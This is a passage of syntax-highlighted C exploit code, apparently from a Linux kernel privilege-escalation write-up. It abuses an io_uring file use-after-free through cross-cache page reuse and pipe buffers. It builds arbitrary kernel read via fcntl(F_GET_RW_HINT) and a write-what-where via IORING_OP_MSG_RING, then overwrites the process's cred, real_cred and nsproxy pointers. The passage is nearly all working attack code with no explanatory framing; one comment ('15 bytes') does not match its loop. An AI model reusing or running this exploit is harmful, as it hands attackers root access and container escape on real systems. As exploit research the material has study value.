    <span class="n">g_cc2_num</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>
    <span class="n">g_cc3_num</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>
<span class="p">}</span>

<span class="c1">// Do cross cache process</span>
<span class="kt">void</span> <span class="nf">do_cc</span><span class="p">(</span><span class="kt">void</span><span class="p">)</span>
<span class="p">{</span>
    <span class="c1">// Start cross-cache process</span>
    <span class="n">cc_1</span><span class="p">();</span>
    <span class="n">cc_2</span><span class="p">();</span>

    <span class="c1">// Allocate the victim filp</span>
    <span class="n">alloc_victim_filp</span><span class="p">();</span>

    <span class="c1">// Free the victim filp</span>
    <span class="n">do_uaf</span><span class="p">();</span>

    <span class="c1">// Resume cross-cache process</span>
    <span class="n">cc_3</span><span class="p">();</span>
    <span class="n">cc_4</span><span class="p">();</span>
    <span class="n">cc_5</span><span class="p">();</span>

    <span class="c1">// Allow pages to be freed</span>
    <span class="n">usleep</span><span class="p">(</span><span class="mi">100000</span><span class="p">);</span>
<span class="p">}</span>

<span class="kt">void</span> <span class="nf">reset_pipe_buf</span><span class="p">(</span><span class="kt">void</span><span class="p">)</span>
<span class="p">{</span>
    <span class="kt">char</span> <span class="n">buf</span><span class="p">[</span><span class="mi">4096</span><span class="p">]</span> <span class="o">=</span> <span class="p">{</span> <span class="mi">0</span> <span class="p">};</span>
    <span class="n">read</span><span class="p">(</span><span class="n">g_pipe</span><span class="p">.</span><span class="n">fd</span><span class="p">[</span><span class="n">PIPE_READ</span><span class="p">],</span> <span class="n">buf</span><span class="p">,</span> <span class="mi">4096</span><span class="p">);</span>
<span class="p">}</span>

<span class="kt">void</span> <span class="nf">zero_pipe_buf</span><span class="p">(</span><span class="kt">void</span><span class="p">)</span>
<span class="p">{</span>
    <span class="kt">char</span> <span class="n">buf</span><span class="p">[</span><span class="mi">4096</span><span class="p">]</span> <span class="o">=</span> <span class="p">{</span> <span class="mi">0</span> <span class="p">};</span>
    <span class="n">write</span><span class="p">(</span><span class="n">g_pipe</span><span class="p">.</span><span class="n">fd</span><span class="p">[</span><span class="n">PIPE_WRITE</span><span class="p">],</span> <span class="n">buf</span><span class="p">,</span> <span class="mi">4096</span><span class="p">);</span>
<span class="p">}</span>

<span class="c1">// Offset inside of inode to inode-&gt;i_write_hint</span>
<span class="cp">#define HINT_OFF 0x8fUL
</span>
<span class="c1">// By using `fcntl(F_GET_RW_HINT)` we can read a single byte at</span>
<span class="c1">// file-&gt;inode-&gt;i_write_hint</span>
<span class="kt">uint64_t</span> <span class="nf">read_8_at</span><span class="p">(</span><span class="kt">unsigned</span> <span class="kt">long</span> <span class="n">addr</span><span class="p">)</span>
<span class="p">{</span>
    <span class="c1">// Set the inode address</span>
    <span class="kt">uint64_t</span> <span class="n">inode_addr_base</span> <span class="o">=</span> <span class="n">addr</span> <span class="o">-</span> <span class="n">HINT_OFF</span><span class="p">;</span>

    <span class="c1">// Set up the buffer for the arbitrary read</span>
    <span class="kt">unsigned</span> <span class="kt">char</span> <span class="n">buf</span><span class="p">[</span><span class="mi">4096</span><span class="p">]</span> <span class="o">=</span> <span class="p">{</span> <span class="mi">0</span> <span class="p">};</span>

    <span class="c1">// Iterate 8 times to read 8 bytes</span>
    <span class="kt">uint64_t</span> <span class="n">val</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>
    <span class="k">for</span> <span class="p">(</span><span class="kt">size_t</span> <span class="n">i</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="n">i</span> <span class="o">&lt;</span> <span class="mi">8</span><span class="p">;</span> <span class="n">i</span><span class="o">++</span><span class="p">)</span>
    <span class="p">{</span>
        <span class="c1">// Calculate inode address</span>
        <span class="kt">uint64_t</span> <span class="n">target</span> <span class="o">=</span> <span class="n">inode_addr_base</span> <span class="o">+</span> <span class="n">i</span><span class="p">;</span>

        <span class="c1">// Set up a fake file 16 times (number of files per page), we don't know</span>
        <span class="c1">// yet which of the 16 slots our UAF file is at</span>
        <span class="n">reset_pipe_buf</span><span class="p">();</span>
        <span class="o">*</span><span class="p">(</span><span class="kt">uint64_t</span> <span class="o">*</span><span class="p">)</span><span class="o">&amp;</span><span class="n">buf</span><span class="p">[</span><span class="mh">0x20</span><span class="p">]</span>  <span class="o">=</span> <span class="n">target</span><span class="p">;</span>
        <span class="o">*</span><span class="p">(</span><span class="kt">uint64_t</span> <span class="o">*</span><span class="p">)</span><span class="o">&amp;</span><span class="n">buf</span><span class="p">[</span><span class="mh">0x120</span><span class="p">]</span> <span class="o">=</span> <span class="n">target</span><span class="p">;</span>
        <span class="o">*</span><span class="p">(</span><span class="kt">uint64_t</span> <span class="o">*</span><span class="p">)</span><span class="o">&amp;</span><span class="n">buf</span><span class="p">[</span><span class="mh">0x220</span><span class="p">]</span> <span class="o">=</span> <span class="n">target</span><span class="p">;</span>
        <span class="o">*</span><span class="p">(</span><span class="kt">uint64_t</span> <span class="o">*</span><span class="p">)</span><span class="o">&amp;</span><span class="n">buf</span><span class="p">[</span><span class="mh">0x320</span><span class="p">]</span> <span class="o">=</span> <span class="n">target</span><span class="p">;</span>
        <span class="o">*</span><span class="p">(</span><span class="kt">uint64_t</span> <span class="o">*</span><span class="p">)</span><span class="o">&amp;</span><span class="n">buf</span><span class="p">[</span><span class="mh">0x420</span><span class="p">]</span> <span class="o">=</span> <span class="n">target</span><span class="p">;</span>
        <span class="o">*</span><span class="p">(</span><span class="kt">uint64_t</span> <span class="o">*</span><span class="p">)</span><span class="o">&amp;</span><span class="n">buf</span><span class="p">[</span><span class="mh">0x520</span><span class="p">]</span> <span class="o">=</span> <span class="n">target</span><span class="p">;</span>
        <span class="o">*</span><span class="p">(</span><span class="kt">uint64_t</span> <span class="o">*</span><span class="p">)</span><span class="o">&amp;</span><span class="n">buf</span><span class="p">[</span><span class="mh">0x620</span><span class="p">]</span> <span class="o">=</span> <span class="n">target</span><span class="p">;</span>
        <span class="o">*</span><span class="p">(</span><span class="kt">uint64_t</span> <span class="o">*</span><span class="p">)</span><span class="o">&amp;</span><span class="n">buf</span><span class="p">[</span><span class="mh">0x720</span><span class="p">]</span> <span class="o">=</span> <span class="n">target</span><span class="p">;</span>
        <span class="o">*</span><span class="p">(</span><span class="kt">uint64_t</span> <span class="o">*</span><span class="p">)</span><span class="o">&amp;</span><span class="n">buf</span><span class="p">[</span><span class="mh">0x820</span><span class="p">]</span> <span class="o">=</span> <span class="n">target</span><span class="p">;</span>
        <span class="o">*</span><span class="p">(</span><span class="kt">uint64_t</span> <span class="o">*</span><span class="p">)</span><span class="o">&amp;</span><span class="n">buf</span><span class="p">[</span><span class="mh">0x920</span><span class="p">]</span> <span class="o">=</span> <span class="n">target</span><span class="p">;</span>
        <span class="o">*</span><span class="p">(</span><span class="kt">uint64_t</span> <span class="o">*</span><span class="p">)</span><span class="o">&amp;</span><span class="n">buf</span><span class="p">[</span><span class="mh">0xa20</span><span class="p">]</span> <span class="o">=</span> <span class="n">target</span><span class="p">;</span>
        <span class="o">*</span><span class="p">(</span><span class="kt">uint64_t</span> <span class="o">*</span><span class="p">)</span><span class="o">&amp;</span><span class="n">buf</span><span class="p">[</span><span class="mh">0xb20</span><span class="p">]</span> <span class="o">=</span> <span class="n">target</span><span class="p">;</span>
        <span class="o">*</span><span class="p">(</span><span class="kt">uint64_t</span> <span class="o">*</span><span class="p">)</span><span class="o">&amp;</span><span class="n">buf</span><span class="p">[</span><span class="mh">0xc20</span><span class="p">]</span> <span class="o">=</span> <span class="n">target</span><span class="p">;</span>
        <span class="o">*</span><span class="p">(</span><span class="kt">uint64_t</span> <span class="o">*</span><span class="p">)</span><span class="o">&amp;</span><span class="n">buf</span><span class="p">[</span><span class="mh">0xd20</span><span class="p">]</span> <span class="o">=</span> <span class="n">target</span><span class="p">;</span>
        <span class="o">*</span><span class="p">(</span><span class="kt">uint64_t</span> <span class="o">*</span><span class="p">)</span><span class="o">&amp;</span><span class="n">buf</span><span class="p">[</span><span class="mh">0xe20</span><span class="p">]</span> <span class="o">=</span> <span class="n">target</span><span class="p">;</span>
        <span class="o">*</span><span class="p">(</span><span class="kt">uint64_t</span> <span class="o">*</span><span class="p">)</span><span class="o">&amp;</span><span class="n">buf</span><span class="p">[</span><span class="mh">0xf20</span><span class="p">]</span> <span class="o">=</span> <span class="n">target</span><span class="p">;</span>

        <span class="c1">// Create the content</span>
        <span class="n">write</span><span class="p">(</span><span class="n">g_pipe</span><span class="p">.</span><span class="n">fd</span><span class="p">[</span><span class="n">PIPE_WRITE</span><span class="p">],</span> <span class="n">buf</span><span class="p">,</span> <span class="mi">4096</span><span class="p">);</span>

        <span class="c1">// Read one byte back</span>
        <span class="kt">uint64_t</span> <span class="n">arg</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>
        <span class="k">if</span> <span class="p">(</span><span class="n">fcntl</span><span class="p">(</span><span class="n">g_uaf_fd</span><span class="p">,</span> <span class="n">F_GET_RW_HINT</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">arg</span><span class="p">)</span> <span class="o">==</span> <span class="o">-</span><span class="mi">1</span><span class="p">)</span>
        <span class="p">{</span>
            <span class="n">err</span><span class="p">(</span><span class="s">"`fcntl()` failed"</span><span class="p">);</span>
        <span class="p">};</span>

        <span class="c1">// Add to val</span>
        <span class="n">val</span> <span class="o">|=</span> <span class="p">(</span><span class="n">arg</span> <span class="o">&lt;&lt;</span> <span class="p">(</span><span class="n">i</span> <span class="o">*</span> <span class="mi">8</span><span class="p">));</span>
    <span class="p">}</span>

    <span class="k">return</span> <span class="n">val</span><span class="p">;</span>
<span class="p">}</span>

<span class="kt">void</span> <span class="nf">read_comm_at</span><span class="p">(</span><span class="kt">unsigned</span> <span class="kt">long</span> <span class="n">addr</span><span class="p">,</span> <span class="kt">char</span> <span class="o">*</span><span class="n">comm</span><span class="p">)</span>
<span class="p">{</span>
    <span class="c1">// Set the inode address</span>
    <span class="kt">uint64_t</span> <span class="n">inode_addr_base</span> <span class="o">=</span> <span class="n">addr</span> <span class="o">-</span> <span class="n">HINT_OFF</span><span class="p">;</span>

    <span class="c1">// Set up the buffer for the arbitrary read</span>
    <span class="kt">unsigned</span> <span class="kt">char</span> <span class="n">buf</span><span class="p">[</span><span class="mi">4096</span><span class="p">]</span> <span class="o">=</span> <span class="p">{</span> <span class="mi">0</span> <span class="p">};</span>

    <span class="c1">// Iterate 15 times to read 15 bytes</span>
    <span class="k">for</span> <span class="p">(</span><span class="kt">size_t</span> <span class="n">i</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="n">i</span> <span class="o">&lt;</span> <span class="mi">8</span><span class="p">;</span> <span class="n">i</span><span class="o">++</span><span class="p">)</span>
    <span class="p">{</span>
        <span class="c1">// Calculate inode address</span>
        <span class="kt">uint64_t</span> <span class="n">target</span> <span class="o">=</span> <span class="n">inode_addr_base</span> <span class="o">+</span> <span class="n">i</span><span class="p">;</span>

        <span class="c1">// Set up a fake file 16 times (number of files per page), we don't know</span>
        <span class="c1">// yet which of the 16 slots our UAF file is at</span>
        <span class="n">reset_pipe_buf</span><span class="p">();</span>
        <span class="o">*</span><span class="p">(</span><span class="kt">uint64_t</span> <span class="o">*</span><span class="p">)</span><span class="o">&amp;</span><span class="n">buf</span><span class="p">[</span><span class="mh">0x20</span><span class="p">]</span>  <span class="o">=</span> <span class="n">target</span><span class="p">;</span>
        <span class="o">*</span><span class="p">(</span><span class="kt">uint64_t</span> <span class="o">*</span><span class="p">)</span><span class="o">&amp;</span><span class="n">buf</span><span class="p">[</span><span class="mh">0x120</span><span class="p">]</span> <span class="o">=</span> <span class="n">target</span><span class="p">;</span>
        <span class="o">*</span><span class="p">(</span><span class="kt">uint64_t</span> <span class="o">*</span><span class="p">)</span><span class="o">&amp;</span><span class="n">buf</span><span class="p">[</span><span class="mh">0x220</span><span class="p">]</span> <span class="o">=</span> <span class="n">target</span><span class="p">;</span>
        <span class="o">*</span><span class="p">(</span><span class="kt">uint64_t</span> <span class="o">*</span><span class="p">)</span><span class="o">&amp;</span><span class="n">buf</span><span class="p">[</span><span class="mh">0x320</span><span class="p">]</span> <span class="o">=</span> <span class="n">target</span><span class="p">;</span>
        <span class="o">*</span><span class="p">(</span><span class="kt">uint64_t</span> <span class="o">*</span><span class="p">)</span><span class="o">&amp;</span><span class="n">buf</span><span class="p">[</span><span class="mh">0x420</span><span class="p">]</span> <span class="o">=</span> <span class="n">target</span><span class="p">;</span>
        <span class="o">*</span><span class="p">(</span><span class="kt">uint64_t</span> <span class="o">*</span><span class="p">)</span><span class="o">&amp;</span><span class="n">buf</span><span class="p">[</span><span class="mh">0x520</span><span class="p">]</span> <span class="o">=</span> <span class="n">target</span><span class="p">;</span>
        <span class="o">*</span><span class="p">(</span><span class="kt">uint64_t</span> <span class="o">*</span><span class="p">)</span><span class="o">&amp;</span><span class="n">buf</span><span class="p">[</span><span class="mh">0x620</span><span class="p">]</span> <span class="o">=</span> <span class="n">target</span><span class="p">;</span>
        <span class="o">*</span><span class="p">(</span><span class="kt">uint64_t</span> <span class="o">*</span><span class="p">)</span><span class="o">&amp;</span><span class="n">buf</span><span class="p">[</span><span class="mh">0x720</span><span class="p">]</span> <span class="o">=</span> <span class="n">target</span><span class="p">;</span>
        <span class="o">*</span><span class="p">(</span><span class="kt">uint64_t</span> <span class="o">*</span><span class="p">)</span><span class="o">&amp;</span><span class="n">buf</span><span class="p">[</span><span class="mh">0x820</span><span class="p">]</span> <span class="o">=</span> <span class="n">target</span><span class="p">;</span>
        <span class="o">*</span><span class="p">(</span><span class="kt">uint64_t</span> <span class="o">*</span><span class="p">)</span><span class="o">&amp;</span><span class="n">buf</span><span class="p">[</span><span class="mh">0x920</span><span class="p">]</span> <span class="o">=</span> <span class="n">target</span><span class="p">;</span>
        <span class="o">*</span><span class="p">(</span><span class="kt">uint64_t</span> <span class="o">*</span><span class="p">)</span><span class="o">&amp;</span><span class="n">buf</span><span class="p">[</span><span class="mh">0xa20</span><span class="p">]</span> <span class="o">=</span> <span class="n">target</span><span class="p">;</span>
        <span class="o">*</span><span class="p">(</span><span class="kt">uint64_t</span> <span class="o">*</span><span class="p">)</span><span class="o">&amp;</span><span class="n">buf</span><span class="p">[</span><span class="mh">0xb20</span><span class="p">]</span> <span class="o">=</span> <span class="n">target</span><span class="p">;</span>
        <span class="o">*</span><span class="p">(</span><span class="kt">uint64_t</span> <span class="o">*</span><span class="p">)</span><span class="o">&amp;</span><span class="n">buf</span><span class="p">[</span><span class="mh">0xc20</span><span class="p">]</span> <span class="o">=</span> <span class="n">target</span><span class="p">;</span>
        <span class="o">*</span><span class="p">(</span><span class="kt">uint64_t</span> <span class="o">*</span><span class="p">)</span><span class="o">&amp;</span><span class="n">buf</span><span class="p">[</span><span class="mh">0xd20</span><span class="p">]</span> <span class="o">=</span> <span class="n">target</span><span class="p">;</span>
        <span class="o">*</span><span class="p">(</span><span class="kt">uint64_t</span> <span class="o">*</span><span class="p">)</span><span class="o">&amp;</span><span class="n">buf</span><span class="p">[</span><span class="mh">0xe20</span><span class="p">]</span> <span class="o">=</span> <span class="n">target</span><span class="p">;</span>
        <span class="o">*</span><span class="p">(</span><span class="kt">uint64_t</span> <span class="o">*</span><span class="p">)</span><span class="o">&amp;</span><span class="n">buf</span><span class="p">[</span><span class="mh">0xf20</span><span class="p">]</span> <span class="o">=</span> <span class="n">target</span><span class="p">;</span>

        <span class="c1">// Create the content</span>
        <span class="n">write</span><span class="p">(</span><span class="n">g_pipe</span><span class="p">.</span><span class="n">fd</span><span class="p">[</span><span class="n">PIPE_WRITE</span><span class="p">],</span> <span class="n">buf</span><span class="p">,</span> <span class="mi">4096</span><span class="p">);</span>

        <span class="c1">// Read one byte back</span>
        <span class="kt">uint64_t</span> <span class="n">arg</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>
        <span class="k">if</span> <span class="p">(</span><span class="n">fcntl</span><span class="p">(</span><span class="n">g_uaf_fd</span><span class="p">,</span> <span class="n">F_GET_RW_HINT</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">arg</span><span class="p">)</span> <span class="o">==</span> <span class="o">-</span><span class="mi">1</span><span class="p">)</span>
        <span class="p">{</span>
            <span class="n">err</span><span class="p">(</span><span class="s">"`fcntl()` failed"</span><span class="p">);</span>
        <span class="p">};</span>

        <span class="c1">// Add to comm buf</span>
        <span class="n">comm</span><span class="p">[</span><span class="n">i</span><span class="p">]</span> <span class="o">=</span> <span class="n">arg</span><span class="p">;</span>
    <span class="p">}</span>
<span class="p">}</span>

<span class="kt">void</span> <span class="nf">write_setup_ctx</span><span class="p">(</span><span class="kt">char</span> <span class="o">*</span><span class="n">buf</span><span class="p">,</span> <span class="kt">uint32_t</span> <span class="n">what</span><span class="p">,</span> <span class="kt">uint64_t</span> <span class="n">where</span><span class="p">)</span>
<span class="p">{</span>
    <span class="c1">// Copy our copied real ring fd </span>
    <span class="n">memcpy</span><span class="p">(</span><span class="o">&amp;</span><span class="n">buf</span><span class="p">[</span><span class="n">g_off</span><span class="p">],</span> <span class="n">g_ring_copy</span><span class="p">,</span> <span class="mi">256</span><span class="p">);</span>

    <span class="c1">// Set f-&gt;f_count to 1 </span>
    <span class="kt">uint64_t</span> <span class="o">*</span><span class="n">count</span> <span class="o">=</span> <span class="p">(</span><span class="kt">uint64_t</span> <span class="o">*</span><span class="p">)</span><span class="o">&amp;</span><span class="n">buf</span><span class="p">[</span><span class="n">g_off</span> <span class="o">+</span> <span class="mh">0x38</span><span class="p">];</span>
    <span class="o">*</span><span class="n">count</span> <span class="o">=</span> <span class="mi">1</span><span class="p">;</span>

    <span class="c1">// Set f-&gt;private_data to our scratch space</span>
    <span class="kt">uint64_t</span> <span class="o">*</span><span class="n">private_data</span> <span class="o">=</span> <span class="p">(</span><span class="kt">uint64_t</span> <span class="o">*</span><span class="p">)</span><span class="o">&amp;</span><span class="n">buf</span><span class="p">[</span><span class="n">g_off</span> <span class="o">+</span> <span class="mh">0xc8</span><span class="p">];</span>
    <span class="o">*</span><span class="n">private_data</span> <span class="o">=</span> <span class="n">g_scratch</span><span class="p">;</span>

    <span class="c1">// Set ctx-&gt;cqe_cached</span>
    <span class="kt">size_t</span> <span class="n">cqe_cached</span> <span class="o">=</span> <span class="n">g_scratch</span> <span class="o">+</span> <span class="mh">0x240</span><span class="p">;</span>
    <span class="n">cqe_cached</span> <span class="o">&amp;=</span> <span class="mh">0xFFF</span><span class="p">;</span>
    <span class="kt">uint64_t</span> <span class="o">*</span><span class="n">cached_ptr</span> <span class="o">=</span> <span class="p">(</span><span class="kt">uint64_t</span> <span class="o">*</span><span class="p">)</span><span class="o">&amp;</span><span class="n">buf</span><span class="p">[</span><span class="n">cqe_cached</span><span class="p">];</span>
    <span class="o">*</span><span class="n">cached_ptr</span> <span class="o">=</span> <span class="n">NULL_MEM</span><span class="p">;</span>

    <span class="c1">// Set ctx-&gt;cqe_sentinel</span>
    <span class="kt">size_t</span> <span class="n">cqe_sentinel</span> <span class="o">=</span> <span class="n">g_scratch</span> <span class="o">+</span> <span class="mh">0x248</span><span class="p">;</span>
    <span class="n">cqe_sentinel</span> <span class="o">&amp;=</span> <span class="mh">0xFFF</span><span class="p">;</span>
    <span class="kt">uint64_t</span> <span class="o">*</span><span class="n">sentinel_ptr</span> <span class="o">=</span> <span class="p">(</span><span class="kt">uint64_t</span> <span class="o">*</span><span class="p">)</span><span class="o">&amp;</span><span class="n">buf</span><span class="p">[</span><span class="n">cqe_sentinel</span><span class="p">];</span>

    <span class="c1">// We need ctx-&gt;cqe_cached &lt; ctx-&gt;cqe_sentinel</span>
    <span class="o">*</span><span class="n">sentinel_ptr</span> <span class="o">=</span> <span class="n">NULL_MEM</span> <span class="o">+</span> <span class="mi">1</span><span class="p">;</span>

    <span class="c1">// Set ctx-&gt;rings so that ctx-&gt;rings-&gt;cq.tail is written to. That is at </span>
    <span class="c1">// offset 0xc0 from cq base address</span>
    <span class="kt">size_t</span> <span class="n">rings</span> <span class="o">=</span> <span class="n">g_scratch</span> <span class="o">+</span> <span class="mh">0x10</span><span class="p">;</span>
    <span class="n">rings</span> <span class="o">&amp;=</span> <span class="mh">0xFFF</span><span class="p">;</span>
    <span class="kt">uint64_t</span> <span class="o">*</span><span class="n">rings_ptr</span> <span class="o">=</span> <span class="p">(</span><span class="kt">uint64_t</span> <span class="o">*</span><span class="p">)</span><span class="o">&amp;</span><span class="n">buf</span><span class="p">[</span><span class="n">rings</span><span class="p">];</span>
    <span class="o">*</span><span class="n">rings_ptr</span> <span class="o">=</span> <span class="n">where</span> <span class="o">-</span> <span class="mh">0xc0</span><span class="p">;</span>

    <span class="c1">// Set ctx-&gt;cached_cq_tail which is our what</span>
    <span class="kt">size_t</span> <span class="n">cq_tail</span> <span class="o">=</span> <span class="n">g_scratch</span> <span class="o">+</span> <span class="mh">0x250</span><span class="p">;</span>
    <span class="n">cq_tail</span> <span class="o">&amp;=</span> <span class="mh">0xFFF</span><span class="p">;</span>
    <span class="kt">uint32_t</span> <span class="o">*</span><span class="n">cq_tail_ptr</span> <span class="o">=</span> <span class="p">(</span><span class="kt">uint32_t</span> <span class="o">*</span><span class="p">)</span><span class="o">&amp;</span><span class="n">buf</span><span class="p">[</span><span class="n">cq_tail</span><span class="p">];</span>
    <span class="o">*</span><span class="n">cq_tail_ptr</span> <span class="o">=</span> <span class="n">what</span><span class="p">;</span>

    <span class="c1">// Set ctx-&gt;cq_wait the list head to itself (so that it's "empty")</span>
    <span class="kt">size_t</span> <span class="n">real_cq_wait</span> <span class="o">=</span> <span class="n">g_scratch</span> <span class="o">+</span> <span class="mh">0x268</span><span class="p">;</span>
    <span class="kt">size_t</span> <span class="n">cq_wait</span> <span class="o">=</span> <span class="p">(</span><span class="n">real_cq_wait</span> <span class="o">&amp;</span> <span class="mh">0xFFF</span><span class="p">);</span>
    <span class="kt">uint64_t</span> <span class="o">*</span><span class="n">cq_wait_ptr</span> <span class="o">=</span> <span class="p">(</span><span class="kt">uint64_t</span> <span class="o">*</span><span class="p">)</span><span class="o">&amp;</span><span class="n">buf</span><span class="p">[</span><span class="n">cq_wait</span><span class="p">];</span>
    <span class="o">*</span><span class="n">cq_wait_ptr</span> <span class="o">=</span> <span class="n">real_cq_wait</span><span class="p">;</span>
<span class="p">}</span>

<span class="kt">void</span> <span class="nf">write_what_where</span><span class="p">(</span><span class="kt">uint32_t</span> <span class="n">what</span><span class="p">,</span> <span class="kt">uint64_t</span> <span class="n">where</span><span class="p">)</span>
<span class="p">{</span>
    <span class="c1">// Reset the page contents</span>
    <span class="n">reset_pipe_buf</span><span class="p">();</span>

    <span class="c1">// Setup the fake file target ctx</span>
    <span class="kt">char</span> <span class="n">buf</span><span class="p">[</span><span class="mi">4096</span><span class="p">]</span> <span class="o">=</span> <span class="p">{</span> <span class="mi">0</span> <span class="p">};</span>
    <span class="n">write_setup_ctx</span><span class="p">(</span><span class="n">buf</span><span class="p">,</span> <span class="n">what</span><span class="p">,</span> <span class="n">where</span><span class="p">);</span>

    <span class="c1">// Set contents</span>
    <span class="n">write</span><span class="p">(</span><span class="n">g_pipe</span><span class="p">.</span><span class="n">fd</span><span class="p">[</span><span class="n">PIPE_WRITE</span><span class="p">],</span> <span class="n">buf</span><span class="p">,</span> <span class="mi">4096</span><span class="p">);</span>

    <span class="c1">// Get an sqe</span>
    <span class="k">struct</span> <span class="n">io_uring_sqe</span> <span class="o">*</span><span class="n">sqe</span> <span class="o">=</span> <span class="nb">NULL</span><span class="p">;</span>
    <span class="n">sqe</span> <span class="o">=</span> <span class="n">io_uring_get_sqe</span><span class="p">(</span><span class="o">&amp;</span><span class="n">g_ring</span><span class="p">);</span>
    <span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="n">sqe</span><span class="p">)</span>
    <span class="p">{</span>
        <span class="n">err</span><span class="p">(</span><span class="s">"`io_uring_get_sqe()` failed"</span><span class="p">);</span>
    <span class="p">}</span>

    <span class="c1">// Set values</span>
    <span class="n">sqe</span><span class="o">-&gt;</span><span class="n">opcode</span> <span class="o">=</span> <span class="n">IORING_OP_MSG_RING</span><span class="p">;</span>
    <span class="n">sqe</span><span class="o">-&gt;</span><span class="n">fd</span> <span class="o">=</span> <span class="n">g_uaf_fd</span><span class="p">;</span>

    <span class="kt">int</span> <span class="n">ret</span> <span class="o">=</span> <span class="n">io_uring_submit</span><span class="p">(</span><span class="o">&amp;</span><span class="n">g_ring</span><span class="p">);</span>
    <span class="k">if</span> <span class="p">(</span><span class="n">ret</span> <span class="o">&lt;</span> <span class="mi">0</span><span class="p">)</span>
    <span class="p">{</span>
        <span class="n">err</span><span class="p">(</span><span class="s">"`io_uring_submit()` failed"</span><span class="p">);</span>
    <span class="p">}</span>

    <span class="c1">// Wait for the completion</span>
    <span class="k">struct</span> <span class="n">io_uring_cqe</span> <span class="o">*</span><span class="n">cqe</span><span class="p">;</span>
    <span class="n">ret</span> <span class="o">=</span> <span class="n">io_uring_wait_cqe</span><span class="p">(</span><span class="o">&amp;</span><span class="n">g_ring</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">cqe</span><span class="p">);</span>
<span class="p">}</span>

<span class="c1">// So in this kernel code path, after we're done with our write-what-where, the </span>
<span class="c1">// what value actually gets incremented ++ style, so we have to decrement</span>
<span class="c1">// the values by one each time.</span>
<span class="c1">// Also, we only have a 4 byte write ability so we have to split up the 8 bytes</span>
<span class="c1">// into 2 separate writes</span>
<span class="kt">void</span> <span class="nf">overwrite_cred</span><span class="p">(</span><span class="kt">void</span><span class="p">)</span>
<span class="p">{</span>
    <span class="kt">uint32_t</span> <span class="n">val_1</span> <span class="o">=</span> <span class="n">g_cred_what</span> <span class="o">&amp;</span> <span class="mh">0xFFFFFFFF</span><span class="p">;</span>
    <span class="kt">uint32_t</span> <span class="n">val_2</span> <span class="o">=</span> <span class="p">(</span><span class="n">g_cred_what</span> <span class="o">&gt;&gt;</span> <span class="mi">32</span><span class="p">)</span> <span class="o">&amp;</span> <span class="mh">0xFFFFFFFF</span><span class="p">;</span>

    <span class="n">write_what_where</span><span class="p">(</span><span class="n">val_1</span> <span class="o">-</span> <span class="mi">1</span><span class="p">,</span> <span class="n">g_cred_where</span><span class="p">);</span>
    <span class="n">write_what_where</span><span class="p">(</span><span class="n">val_2</span> <span class="o">-</span> <span class="mi">1</span><span class="p">,</span> <span class="n">g_cred_where</span> <span class="o">+</span> <span class="mh">0x4</span><span class="p">);</span>
<span class="p">}</span>

<span class="kt">void</span> <span class="nf">overwrite_real_cred</span><span class="p">(</span><span class="kt">void</span><span class="p">)</span>
<span class="p">{</span>
    <span class="kt">uint32_t</span> <span class="n">val_1</span> <span class="o">=</span> <span class="n">g_cred_what</span> <span class="o">&amp;</span> <span class="mh">0xFFFFFFFF</span><span class="p">;</span>
    <span class="kt">uint32_t</span> <span class="n">val_2</span> <span class="o">=</span> <span class="p">(</span><span class="n">g_cred_what</span> <span class="o">&gt;&gt;</span> <span class="mi">32</span><span class="p">)</span> <span class="o">&amp;</span> <span class="mh">0xFFFFFFFF</span><span class="p">;</span>

    <span class="n">write_what_where</span><span class="p">(</span><span class="n">val_1</span> <span class="o">-</span> <span class="mi">1</span><span class="p">,</span> <span class="n">g_real_cred_where</span><span class="p">);</span>
    <span class="n">write_what_where</span><span class="p">(</span><span class="n">val_2</span> <span class="o">-</span> <span class="mi">1</span><span class="p">,</span> <span class="n">g_real_cred_where</span> <span class="o">+</span> <span class="mh">0x4</span><span class="p">);</span>
<span class="p">}</span>

<span class="kt">void</span> <span class="nf">overwrite_nsproxy</span><span class="p">(</span><span class="kt">void</span><span class="p">)</span>
<span class="p">{</span>
    <span class="kt">uint32_t</span> <span class="n">val_1</span> <span class="o">=</span> <span class="n">g_nsproxy_what</span> <span class="o">&amp;</span> <span class="mh">0xFFFFFFFF</span><span class="p">;</span>
    <span class="kt">uint32_t</span> <span class="n">val_2</span> <span class="o">=</span> <span class="p">(</span><span class="n">g_nsproxy_what</span> <span class="o">&gt;&gt;</span> <span class="mi">32</span><span class="p">)</span> <span class="o">&amp;</span> <span class="mh">0xFFFFFFFF</span><span class="p">;</span>

    <span class="n">write_what_where</span><span class="p">(</span><span class="n">val_1</span> <span class="o">-</span> <span class="mi">1</span><span class="p">,</span> <span class="n">g_nsproxy_where</span><span class="p">);</span>
    <span class="n">write_what_where</span><span class="p">(</span><span class="n">val_2</span> <span class="o">-</span> <span class="mi">1</span><span class="p">,</span> <span class="n">g_nsproxy_where</span> <span class="o">+</span> <span class="mh">0x4</span><span class="p">);</span>
<span class="p">}</span>

<span class="c1">// Try to fuzzily validate leaked task addresses lol</span>
<span class="kt">int</span> <span class="nf">task_valid</span><span class="p">(</span><span class="kt">uint64_t</span> <span class="n">task</span><span class="p">)</span>
<span class="p">{</span>
    <span class="k">if</span> <span class="p">((</span><span class="kt">uint16_t</span><span class="p">)(</span><span class="n">task</span> <span class="o">&gt;&gt;</span> <span class="mi">48</span><span class="p">)</span> <span class="o">==</span> <span class="mh">0xFFFF</span><span class="p">)</span> <span class="p">{</span> <span class="k">return</span> <span class="mi">1</span><span class="p">;</span> <span class="p">}</span>
    <span class="k">else</span> <span class="p">{</span> <span class="k">return</span> <span class="mi">0</span><span class="p">;</span> <span class="p">}</span> 
<span class="p">}</span>

<span class="kt">void</span> <span class="nf">traverse_tasks</span><span class="p">(</span><span class="kt">void</span><span class="p">)</span>
<span class="p">{</span>    
    <span class="c1">// Process name buf</span>
    <span class="kt">char</span> <span class="n">current_comm</span><span class="p">[</span><span class="mi">16</span><span class="p">]</span> <span class="o">=</span> <span class="p">{</span> <span class="mi">0</span> <span class="p">};</span>

    <span class="c1">// Get the next task after init</span>
